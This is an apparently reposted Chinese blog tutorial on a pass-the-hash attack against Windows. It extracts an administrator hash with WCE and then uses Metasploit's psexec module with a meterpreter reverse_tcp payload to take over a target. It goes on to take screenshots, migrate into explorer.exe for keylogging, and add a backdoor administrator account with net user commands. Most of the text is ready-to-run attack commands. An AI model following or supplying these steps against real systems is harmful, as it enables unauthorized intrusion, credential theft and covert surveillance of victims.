在metasploit中只要有密碼的哈希值就可以***操作系統了不需要明文密碼,下面以實驗爲目的先用工具wce在操作系統上提取管理員密碼的哈希值。
下載wcehttp://1230tt.com/download/wce_v1_4beta_x32.zip
在目標服務器上進入目錄wce -l獲取管理密碼哈希值1AA818381E4E281BAAD3B435B51404EE:5F18A8499CDD4F43D89424AD39CE9AF7
在backtrack裏面進入metasploit選擇windows/smb/psexec模塊,選擇meterpreter***載荷設置LHOST本地IP和RHOST目標主機IP,設置SMBUser用戶名和密碼,然後exploit就可以***了
root@bt:~# msfconsole
msf > use windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.116
msf exploit(psexec) > set RHOST 192.168.1.117
msf exploit(psexec) >set SMBUser administrator
msf exploit(psexec) > set SMBPass 1AA818381E4E281BAAD3B435B51404EE:5F18A8499CDD4F43D89424AD39CE9AF7
在meterpreter下可以截圖meterpreter > screenshot可以查看系統信息meterpreter > sysinfo
可以查看系統進程meterpreter > ps,還可以啓用鍵盤記錄,查看系統進程然後監視explore.exe進程啓動鍵盤記錄就可以查看鍵盤記錄了。meterpreter > migrate 2744
meterpreter > run post/windows/capture/keylog_recorder
記錄鍵盤以txt文件保存在root目錄下,cat文件就可以看到目標主機上的鍵盤記錄了。
進入shell添加用戶並提升爲administrators管理員用戶組。
C:\WINDOWS\system32>net user 4 4 /add
C:\WINDOWS\system32>net localgroup administrators 4 /add
原文鏈接:http://1230tt.com/archives/233.html